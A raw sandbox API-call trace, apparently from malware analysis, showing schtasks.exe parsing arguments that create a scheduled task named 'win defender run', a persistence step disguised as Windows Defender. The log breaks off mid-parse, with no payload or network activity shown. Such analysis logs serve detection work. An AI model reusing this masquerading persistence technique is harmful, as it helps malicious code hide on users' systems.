entry_point = 0x75886220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1661 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1662 start_va = 0x6c9e0000 end_va = 0x6ca6bfff monitored = 0 entry_point = 0x6ca1a6c0 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll") Region: id = 1667 start_va = 0x6d3c0000 end_va = 0x6d3ecfff monitored = 0 entry_point = 0x6d3d2b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Thread: id = 123 os_tid = 0x1064 [0176.325] GetModuleHandleA (lpModuleName=0x0) returned 0x3a0000 [0176.325] __set_app_type (_Type=0x1) [0176.325] __p__fmode () returned 0x75734d6c [0176.325] __p__commode () returned 0x75735b1c [0176.325] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3c0840) returned 0x0 [0176.326] __wgetmainargs (in: _Argc=0x3cade0, _Argv=0x3cade4, _Env=0x3cade8, _DoWildCard=0, _StartInfo=0x3cadf4 | out: _Argc=0x3cade0, _Argv=0x3cade4, _Env=0x3cade8) returned 0 [0176.326] _onexit (_Func=0x3c2bc0) returned 0x3c2bc0 [0176.327] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0176.327] WinSqmIsOptedIn () returned 0x0 [0176.327] GetProcessHeap () returned 0x47c0000 [0176.327] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47c7730 [0176.327] RtlRestoreLastWin32Error () returned 0x0 [0176.327] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0176.327] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0176.328] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0176.328] RtlVerifyVersionInfo (VersionInfo=0xdf9f8, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0 [0176.328] GetProcessHeap () returned 0x47c0000 [0176.328] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47c7640 [0176.328] lstrlenW (lpString="") returned 0 [0176.328] GetProcessHeap () returned 0x47c0000 [0176.328] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x2) returned 0x47c0598 [0176.328] GetProcessHeap () returned 0x47c0000 [0176.328] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c6e38 [0176.328] GetProcessHeap () returned 0x47c0000 [0176.328] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47c76b8 [0176.328] GetProcessHeap () returned 0x47c0000 [0176.328] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c6c00 [0176.328] GetProcessHeap () returned 0x47c0000 [0176.328] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c6c20 [0176.328] GetProcessHeap () returned 0x47c0000 [0176.328] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c6c40 [0176.329] GetProcessHeap () returned 0x47c0000 [0176.329] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c6830 [0176.329] GetProcessHeap () returned 0x47c0000 [0176.329] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47c76d0 [0176.329] GetProcessHeap () returned 0x47c0000 [0176.329] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c6850 [0176.329] GetProcessHeap () returned 0x47c0000 [0176.329] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c6870 [0176.329] GetProcessHeap () returned 0x47c0000 [0176.330] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c65c8 [0176.330] GetProcessHeap () returned 0x47c0000 [0176.330] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c65e8 [0176.330] GetProcessHeap () returned 0x47c0000 [0176.330] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47c7610 [0176.330] GetProcessHeap () returned 0x47c0000 [0176.330] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c6608 [0176.330] GetProcessHeap () returned 0x47c0000 [0176.330] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c2778 [0176.330] GetProcessHeap () returned 0x47c0000 [0176.330] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c2798 [0176.330] GetProcessHeap () returned 0x47c0000 [0176.330] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c27b8 [0176.330] SetThreadUILanguage (LangId=0x0) returned 0x409 [0176.438] RtlRestoreLastWin32Error () returned 0x0 [0176.438] GetProcessHeap () returned 0x47c0000 [0176.438] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c9578 [0176.438] GetProcessHeap () returned 0x47c0000 [0176.439] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c95d8 [0176.439] GetProcessHeap () returned 0x47c0000 [0176.439] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c94f8 [0176.439] GetProcessHeap () returned 0x47c0000 [0176.439] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c93d8 [0176.439] GetProcessHeap () returned 0x47c0000 [0176.439] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c9638 [0176.439] GetProcessHeap () returned 0x47c0000 [0176.439] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47c7568 [0176.439] _memicmp (_Buf1=0x47c7568, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.439] GetProcessHeap () returned 0x47c0000 [0176.439] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x208) returned 0x47c8cd0 [0176.440] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x47c8cd0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0176.440] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0xdfb04 | out: lpdwHandle=0xdfb04) returned 0x76c [0176.442] GetProcessHeap () returned 0x47c0000 [0176.442] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x776) returned 0x47c9da8 [0176.445] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0x47c9da8 | out: lpData=0x47c9da8) returned 1 [0176.445] VerQueryValueW (in: pBlock=0x47c9da8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdfb0c, puLen=0xdfb10 | out: lplpBuffer=0xdfb0c*=0x47ca158, puLen=0xdfb10) returned 1 [0176.450] _memicmp (_Buf1=0x47c7568, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.450] _vsnwprintf (in: _Buffer=0x47c8cd0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdfaf0 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0176.451] VerQueryValueW (in: pBlock=0x47c9da8, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdfb1c, puLen=0xdfb18 | out: lplpBuffer=0xdfb1c*=0x47c9f88, puLen=0xdfb18) returned 1 [0176.451] lstrlenW (lpString="schtasks.exe") returned 12 [0176.451] lstrlenW (lpString="schtasks.exe") returned 12 [0176.451] lstrlenW (lpString=".EXE") returned 4 [0176.451] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0176.452] lstrlenW (lpString="schtasks.exe") returned 12 [0176.452] lstrlenW (lpString=".EXE") returned 4 [0176.452] _memicmp (_Buf1=0x47c7568, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.452] lstrlenW (lpString="schtasks") returned 8 [0176.452] GetProcessHeap () returned 0x47c0000 [0176.452] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c93f8 [0176.452] GetProcessHeap () returned 0x47c0000 [0176.452] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c9518 [0176.453] GetProcessHeap () returned 0x47c0000 [0176.453] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c9658 [0176.453] GetProcessHeap () returned 0x47c0000 [0176.453] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c95f8 [0176.453] GetProcessHeap () returned 0x47c0000 [0176.453] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47c7718 [0176.453] _memicmp (_Buf1=0x47c7718, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.453] GetProcessHeap () returned 0x47c0000 [0176.453] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0xa0) returned 0x47c69d0 [0176.453] GetProcessHeap () returned 0x47c0000 [0176.453] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c9418 [0176.453] GetProcessHeap () returned 0x47c0000 [0176.453] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c9678 [0176.453] GetProcessHeap () returned 0x47c0000 [0176.453] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c9458 [0176.454] GetProcessHeap () returned 0x47c0000 [0176.454] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47c75b0 [0176.454] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.454] GetProcessHeap () returned 0x47c0000 [0176.454] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x200) returned 0x47ca788 [0176.454] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0176.454] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0176.454] GetProcessHeap () returned 0x47c0000 [0176.454] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x30) returned 0x47c6a78 [0176.454] _vsnwprintf (in: _Buffer=0x47c69d0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdfaf4 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0176.454] GetProcessHeap () returned 0x47c0000 [0176.455] GetProcessHeap () returned 0x47c0000 [0176.455] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9da8) returned 1 [0176.455] GetProcessHeap () returned 0x47c0000 [0176.455] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9da8) returned 0x776 [0176.455] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9da8) returned 1 [0176.455] RtlRestoreLastWin32Error () returned 0x0 [0176.455] GetThreadLocale () returned 0x409 [0176.455] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.455] lstrlenW (lpString="?") returned 1 [0176.455] GetThreadLocale () returned 0x409 [0176.455] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.455] lstrlenW (lpString="create") returned 6 [0176.455] GetThreadLocale () returned 0x409 [0176.455] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.455] lstrlenW (lpString="delete") returned 6 [0176.455] GetThreadLocale () returned 0x409 [0176.456] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.456] lstrlenW (lpString="query") returned 5 [0176.456] GetThreadLocale () returned 0x409 [0176.456] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.456] lstrlenW (lpString="change") returned 6 [0176.456] GetThreadLocale () returned 0x409 [0176.456] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.456] lstrlenW (lpString="run") returned 3 [0176.456] GetThreadLocale () returned 0x409 [0176.456] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.456] lstrlenW (lpString="end") returned 3 [0176.456] GetThreadLocale () returned 0x409 [0176.456] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.456] lstrlenW (lpString="showsid") returned 7 [0176.456] GetThreadLocale () returned 0x409 [0176.456] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.456] RtlRestoreLastWin32Error () returned 0x0 [0176.456] RtlRestoreLastWin32Error () returned 0x0 [0176.456] lstrlenW (lpString="/create") returned 7 [0176.456] lstrlenW (lpString="-/") returned 2 [0176.456] StrChrIW (lpStart="-/", wMatch=0x30002f) returned="/" [0176.457] lstrlenW (lpString="?") returned 1 [0176.457] lstrlenW (lpString="?") returned 1 [0176.457] GetProcessHeap () returned 0x47c0000 [0176.457] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47c75c8 [0176.457] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.457] GetProcessHeap () returned 0x47c0000 [0176.457] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0xa) returned 0x47c7658 [0176.457] lstrlenW (lpString="create") returned 6 [0176.457] GetProcessHeap () returned 0x47c0000 [0176.457] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47c75f8 [0176.457] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.457] GetProcessHeap () returned 0x47c0000 [0176.457] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c9438 [0176.457] _vsnwprintf (in: _Buffer=0x47c7658, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0176.457] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0176.458] lstrlenW (lpString="|?|") returned 3 [0176.458] lstrlenW (lpString="|create|") returned 8 [0176.458] RtlRestoreLastWin32Error () returned 0x490 [0176.458] lstrlenW (lpString="create") returned 6 [0176.458] lstrlenW (lpString="create") returned 6 [0176.458] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.458] GetProcessHeap () returned 0x47c0000 [0176.458] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c7658) returned 1 [0176.458] GetProcessHeap () returned 0x47c0000 [0176.458] RtlReAllocateHeap (Heap=0x47c0000, Flags=0xc, Ptr=0x47c7658, Size=0x14) returned 0x47c9558 [0176.458] lstrlenW (lpString="create") returned 6 [0176.458] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.459] _vsnwprintf (in: _Buffer=0x47c9558, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0176.459] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0176.459] lstrlenW (lpString="|create|") returned 8 [0176.459] lstrlenW (lpString="|create|") returned 8 [0176.459] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|" [0176.459] RtlRestoreLastWin32Error () returned 0x0 [0176.459] RtlRestoreLastWin32Error () returned 0x0 [0176.459] RtlRestoreLastWin32Error () returned 0x0 [0176.459] lstrlenW (lpString="/tn") returned 3 [0176.459] lstrlenW (lpString="-/") returned 2 [0176.459] StrChrIW (lpStart="-/", wMatch=0x30002f) returned="/" [0176.459] lstrlenW (lpString="?") returned 1 [0176.459] lstrlenW (lpString="?") returned 1 [0176.459] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.459] lstrlenW (lpString="tn") returned 2 [0176.459] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.459] _vsnwprintf (in: _Buffer=0x47c9558, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0176.459] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0176.460] lstrlenW (lpString="|?|") returned 3 [0176.460] lstrlenW (lpString="|tn|") returned 4 [0176.460] RtlRestoreLastWin32Error () returned 0x490 [0176.460] lstrlenW (lpString="create") returned 6 [0176.460] lstrlenW (lpString="create") returned 6 [0176.460] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.460] lstrlenW (lpString="tn") returned 2 [0176.460] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.460] _vsnwprintf (in: _Buffer=0x47c9558, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0176.461] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0176.461] lstrlenW (lpString="|create|") returned 8 [0176.461] lstrlenW (lpString="|tn|") returned 4 [0176.461] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0176.461] RtlRestoreLastWin32Error () returned 0x490 [0176.461] lstrlenW (lpString="delete") returned 6 [0176.461] lstrlenW (lpString="delete") returned 6 [0176.461] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.461] lstrlenW (lpString="tn") returned 2 [0176.461] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.461] _vsnwprintf (in: _Buffer=0x47c9558, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0176.461] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0176.461] lstrlenW (lpString="|delete|") returned 8 [0176.461] lstrlenW (lpString="|tn|") returned 4 [0176.461] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0 [0176.462] RtlRestoreLastWin32Error () returned 0x490 [0176.462] lstrlenW (lpString="query") returned 5 [0176.462] lstrlenW (lpString="query") returned 5 [0176.462] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.462] lstrlenW (lpString="tn") returned 2 [0176.462] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.462] _vsnwprintf (in: _Buffer=0x47c9558, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7 [0176.462] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0176.462] lstrlenW (lpString="|query|") returned 7 [0176.462] lstrlenW (lpString="|tn|") returned 4 [0176.463] StrStrIW (lpFirst="|query|", lpSrch="|tn|") returned 0x0 [0176.463] RtlRestoreLastWin32Error () returned 0x490 [0176.463] lstrlenW (lpString="change") returned 6 [0176.463] lstrlenW (lpString="change") returned 6 [0176.463] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.463] lstrlenW (lpString="tn") returned 2 [0176.463] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.463] _vsnwprintf (in: _Buffer=0x47c9558, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8 [0176.463] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0176.463] lstrlenW (lpString="|change|") returned 8 [0176.463] lstrlenW (lpString="|tn|") returned 4 [0176.463] StrStrIW (lpFirst="|change|", lpSrch="|tn|") returned 0x0 [0176.463] RtlRestoreLastWin32Error () returned 0x490 [0176.464] lstrlenW (lpString="run") returned 3 [0176.464] lstrlenW (lpString="run") returned 3 [0176.464] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.464] lstrlenW (lpString="tn") returned 2 [0176.464] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.464] _vsnwprintf (in: _Buffer=0x47c9558, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5 [0176.464] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0176.464] lstrlenW (lpString="|run|") returned 5 [0176.464] lstrlenW (lpString="|tn|") returned 4 [0176.464] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0 [0176.464] RtlRestoreLastWin32Error () returned 0x490 [0176.464] lstrlenW (lpString="end") returned 3 [0176.464] lstrlenW (lpString="end") returned 3 [0176.465] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.465] lstrlenW (lpString="tn") returned 2 [0176.465] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.465] _vsnwprintf (in: _Buffer=0x47c9558, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5 [0176.465] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0176.465] lstrlenW (lpString="|end|") returned 5 [0176.465] lstrlenW (lpString="|tn|") returned 4 [0176.465] StrStrIW (lpFirst="|end|", lpSrch="|tn|") returned 0x0 [0176.465] RtlRestoreLastWin32Error () returned 0x490 [0176.465] lstrlenW (lpString="showsid") returned 7 [0176.465] lstrlenW (lpString="showsid") returned 7 [0176.465] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.465] GetProcessHeap () returned 0x47c0000 [0176.466] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9558) returned 1 [0176.466] GetProcessHeap () returned 0x47c0000 [0176.466] RtlReAllocateHeap (Heap=0x47c0000, Flags=0xc, Ptr=0x47c9558, Size=0x16) returned 0x47c9478 [0176.466] lstrlenW (lpString="tn") returned 2 [0176.466] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.466] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9 [0176.466] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0176.466] lstrlenW (lpString="|showsid|") returned 9 [0176.466] lstrlenW (lpString="|tn|") returned 4 [0176.466] StrStrIW (lpFirst="|showsid|", lpSrch="|tn|") returned 0x0 [0176.466] RtlRestoreLastWin32Error () returned 0x490 [0176.467] RtlRestoreLastWin32Error () returned 0x490 [0176.467] RtlRestoreLastWin32Error () returned 0x0 [0176.467] lstrlenW (lpString="/tn") returned 3 [0176.467] StrChrIW (lpStart="/tn", wMatch=0x3a) returned 0x0 [0176.467] RtlRestoreLastWin32Error () returned 0x490 [0176.467] RtlRestoreLastWin32Error () returned 0x0 [0176.467] lstrlenW (lpString="/tn") returned 3 [0176.467] GetProcessHeap () returned 0x47c0000 [0176.467] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x8) returned 0x47c6c60 [0176.467] GetProcessHeap () returned 0x47c0000 [0176.467] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c9558 [0176.467] RtlRestoreLastWin32Error () returned 0x0 [0176.467] RtlRestoreLastWin32Error () returned 0x0 [0176.467] lstrlenW (lpString="win defender run") returned 16 [0176.467] lstrlenW (lpString="-/") returned 2 [0176.467] StrChrIW (lpStart="-/", wMatch=0x300077) returned 0x0 [0176.467] RtlRestoreLastWin32Error () returned 0x490 [0176.467] RtlRestoreLastWin32Error () returned 0x490 [0176.467] RtlRestoreLastWin32Error () returned 0x0 [0176.467] lstrlenW (lpString="win defender run") returned 16 [0176.467] StrChrIW (lpStart="win defender run", wMatch=0x3a) returned 0x0 [0176.468] RtlRestoreLastWin32Error () returned 0x490 [0176.468] RtlRestoreLastWin32Error () returned 0x0 [0176.468] lstrlenW (lpString="win defender run") returned 16 [0176.468] GetProcessHeap () returned 0x47c0000 [0176.468] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x22) returned 0x47c8fb0 [0176.468] GetProcessHeap () returned 0x47c0000 [0176.468] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c94b8 [0176.468] RtlRestoreLastWin32Error () returned 0x0 [0176.468] RtlRestoreLastWin32Error () returned 0x0 [0176.468] lstrlenW (lpString="/sc") returned 3 [0176.468] lstrlenW (lpString="-/") returned 2 [0176.468] StrChrIW (lpStart="-/", wMatch=0x30002f) returned="/" [0176.468] lstrlenW (lpString="?") returned 1 [0176.468] lstrlenW (lpString="?") returned 1 [0176.468] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.468] lstrlenW (lpString="sc") returned 2 [0176.468] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.469] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0176.469] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0176.469] lstrlenW (lpString="|?|") returned 3 [0176.469] lstrlenW (lpString="|sc|") returned 4 [0176.469] RtlRestoreLastWin32Error () returned 0x490 [0176.469] lstrlenW (lpString="create") returned 6 [0176.469] lstrlenW (lpString="create") returned 6 [0176.469] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.469] lstrlenW (lpString="sc") returned 2 [0176.469] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.470] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0176.470] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0176.470] lstrlenW (lpString="|create|") returned 8 [0176.470] lstrlenW (lpString="|sc|") returned 4 [0176.470] StrStrIW (lpFirst="|create|", lpSrch="|sc|") returned 0x0 [0176.470] RtlRestoreLastWin32Error () returned 0x490 [0176.470] lstrlenW (lpString="delete") returned 6 [0176.470] lstrlenW (lpString="delete") returned 6 [0176.470] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.471] lstrlenW (lpString="sc") returned 2 [0176.471] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.471] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0176.471] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0176.471] lstrlenW (lpString="|delete|") returned 8 [0176.471] 